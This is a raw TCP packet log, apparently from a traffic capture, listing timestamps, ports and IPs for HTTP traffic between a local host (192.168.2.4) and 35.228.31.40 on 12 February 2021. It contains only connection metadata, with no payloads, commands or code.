Feb 12, 2021 01:50:11.152000904 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.152002096 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152017117 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.152018070 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152034044 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152050018 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152060986 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152067900 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.152077913 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152079105 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.152095079 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.152129889 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.152149916 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229454041 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229485035 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229497910 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229512930 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229523897 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229537010 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229552031 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229568005 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229584932 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229598999 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229610920 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229621887 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229639053 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229651928 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229662895 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229665041 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229679108 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229695082 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229696989 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229710102 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229744911 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229744911 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229760885 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229780912 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229784966 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229792118 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229799032 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229814053 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229815006 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229831934 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229847908 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229859114 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229862928 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229882956 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229896069 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229901075 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229919910 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229926109 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229937077 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229952097 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229954004 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229968071 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229983091 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.229993105 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.229999065 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230015039 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230016947 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.230031013 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230051041 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230065107 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.230067968 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230083942 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230087042 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.230099916 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.230124950 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.230165958 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.240235090 CET	80	49771	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.249445915 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:11.307421923 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307446957 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307461977 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307477951 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307492971 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307512045 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307529926 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307544947 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307559967 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307575941 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307590961 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307606936 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307619095 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307635069 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307651043 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307653904 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307667017 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307682991 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307694912 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307698011 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307701111 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307712078 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307720900 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307723045 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307725906 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307738066 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307739019 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307740927 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307749987 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307761908 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307761908 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307775021 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307786942 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307797909 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307811022 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307822943 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307835102 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307847023 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307862043 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307873964 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307885885 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307895899 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307898045 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307915926 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307929039 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.307939053 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307971001 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.307986975 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.308007002 CET	49770	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.308696032 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:11.385304928 CET	80	49770	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.742741108 CET	80	49771	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.742913008 CET	49771	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.742986917 CET	49771	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.801415920 CET	49772	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.820401907 CET	80	49771	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.879132032 CET	80	49772	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:11.879354954 CET	49772	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.879420042 CET	49772	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.879429102 CET	49772	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:11.957304001 CET	80	49772	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:12.449512959 CET	49733	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:12.545542955 CET	80	49772	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:12.545660019 CET	49772	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:12.545825005 CET	49772	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:12.609667063 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:12.620431900 CET	80	49772	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:12.621304035 CET	49732	443	192.168.2.4	87.248.118.23
Feb 12, 2021 01:50:12.684477091 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:12.684782982 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:12.687797070 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:12.804377079 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.136847973 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.136907101 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.136946917 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.136984110 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.136987925 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.137022972 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.137049913 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.137063980 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.137113094 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.137115002 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.137156963 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.137193918 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.137223005 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.137233019 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.137288094 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212085009 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212155104 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212197065 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212217093 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212234974 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212275028 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212290049 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212315083 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212352037 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212366104 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212392092 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212430000 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212451935 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212477922 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212522984 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212538004 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212563038 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212601900 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212615967 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212641001 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212677002 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212699890 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212716103 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212754965 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212781906 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212804079 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212846994 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212862968 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.212887049 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.212940931 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.287924051 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.287997007 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288041115 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288072109 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288079977 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288120985 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288137913 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288160086 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288197994 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288213015 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288237095 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288275957 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288290024 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288325071 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288368940 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288389921 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288408041 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288446903 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288463116 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288486958 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288527012 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288548946 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288567066 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288604975 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288623095 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288656950 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288701057 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288717031 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288741112 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288779974 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288794041 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288820028 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288850069 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288880110 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288919926 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288958073 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.288984060 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.288995028 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289011955 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289041996 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289086103 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289100885 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289124012 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289163113 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289177895 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289202929 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289242029 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289256096 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289280891 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289319992 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289334059 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289369106 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289452076 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289453030 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289496899 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289535999 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289551973 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.289577007 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.289630890 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366065025 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366123915 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366163015 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366190910 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366202116 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366241932 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366260052 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366291046 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366333961 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366343975 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366374016 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366413116 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366426945 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366451979 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366488934 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366504908 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366529942 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366569042 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366585970 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366616964 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366660118 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366677046 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366698980 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366738081 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366751909 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366777897 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366813898 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366833925 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366852999 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366892099 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366910934 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.366940975 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366983891 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.366997957 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367022991 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367060900 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367078066 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367100000 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367137909 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367155075 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367177010 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367213964 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367229939 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367261887 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367305040 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367319107 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367343903 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367382050 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367397070 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367420912 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367456913 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367474079 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367495060 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367527008 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367552996 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367574930 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367618084 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367626905 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.367650032 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.367702007 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.377113104 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377166986 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377207994 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377244949 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377284050 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377305031 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.377322912 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377336025 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.377372026 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377378941 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.377448082 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377487898 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377511024 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.377528906 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.377587080 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.442460060 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442517996 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442559958 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442579985 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.442599058 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442640066 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442662001 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.442687988 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442732096 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442754984 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.442771912 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442811012 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442835093 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.442850113 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442888021 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442905903 CET	49773	80	192.168.2.4	35.228.31.40
Feb 12, 2021 01:50:13.442926884 CET	80	49773	35.228.31.40	192.168.2.4
Feb 12, 2021 01:50:13.442965031 CET	80	49773	35.228.31.40	192.168.2.4
